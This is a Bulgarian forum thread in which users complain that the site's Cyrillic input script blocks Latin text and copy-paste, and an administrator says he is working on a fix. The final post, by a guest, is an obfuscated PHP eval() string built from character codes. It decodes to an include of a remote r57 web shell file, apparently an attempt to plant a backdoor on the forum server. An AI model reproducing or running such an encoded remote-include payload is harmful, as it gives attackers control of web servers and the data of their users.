Jump to content
Guest surr3a1

Някой няма ли да оправи кирилицата?

Recommended Posts

Guest surr3a1

Момчета модератори администратори и така нататъка...Писна ми на оная работа да не мога едно нещо да напиша на ВЬШСХСЪЬ да му еба майката... оправете тая простотия смотана!!!Не мога да пиша неща които определено са за латиница с кирилски букви... копи пейст не бачка... тва форум ли е или детска залагалка... кво защитавате смотаната кирилица като един линк не мога пейстна... Баси побеснях... ако щете го трийте тоя пост ако щете кото искате правете... няма друг форум в цялото интернет пространство дето кирилицата проблемна да е решена по тоя супер смешен начин...

Сподели публикацията


Адрес на коментара
Сподели в други сайтове
Guest Magnum

не се ядосвай пич, нещо Firefox-а не се сработва добре с кирилицата - и на мен ми се случва понякога да не мога да превключа на латиница точно в този прозорец, и Ctrl-V не работи излиза ми 'ж'но не е нарочно сигурен съм, по-скоро бъг на firefox-а и/или кирилизиращото модулчеизползвай десния клавиш на мишката за copy/paste ако ти се случи, или отвори наново прозореца

Сподели публикацията


Адрес на коментара
Сподели в други сайтове
Guest surr3a1

абе така е бате.. ама влез във вече нарицателния тунинг.бг и виж дали не работи?нещо не е наред тука.. преди работеше... но това да не мога да напиша ХОНДА на английски е 100 пъти по-дразнещо от това да чета на латинца...

Сподели публикацията


Адрес на коментара
Сподели в други сайтове
Guest Magnum

отваряш един notepad, пишеш там, и с мишката го paste-ваш тукда се надяваме Виктор да направи нещо по въпроса. Но ако не може да го възпроизведе този бъг или не е в неговите настройки ... ще чакаме за новата версия на IPB

Сподели публикацията


Адрес на коментара
Сподели в други сайтове
Guest 1net

проблема май наистина е или във Файърфокс-а ( личи ли ми че съм с него :) ) или в КРЕДОР-аВиктореееееее, помагай пич че верно е много дразнещо :)

Сподели публикацията


Адрес на коментара
Сподели в други сайтове
Guest surr3a1

Аз не ползвам нищо ... просто то си пише автоматично на БГ... дори да ми е сетната клавиатурата на АНГ... не признава нищо...

Сподели публикацията


Адрес на коментара
Сподели в други сайтове
Guest Victor

Кредорът е доста вехт скрипт, по-новите по някаква незнайна причина не искат да сработят тук. Пробвал съм няколко неща, ще пробвам и занапред, като проработи, ще се разбере. Междувременно със смърдежи нищо няма да постигнете, освен да ме ядосате.

Сподели публикацията


Адрес на коментара
Сподели в други сайтове
Guest n00bz

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Сподели публикацията


Адрес на коментара
Сподели в други сайтове

Създайте нов акаунт или се впишете, за да коментирате

За да коментирате, трябва да имате регистрация

Създайте акаунт

Присъединете се към нашата общност. Регистрацията става бързо!

Регистрация на нов акаунт

Вход

Имате акаунт? Впишете се оттук.

Вписване

  • Потребители разглеждащи страницата   0 потребители

    No registered users viewing this page.

  • Предстоящи събития

    No upcoming events found
×
×
  • Създай нов...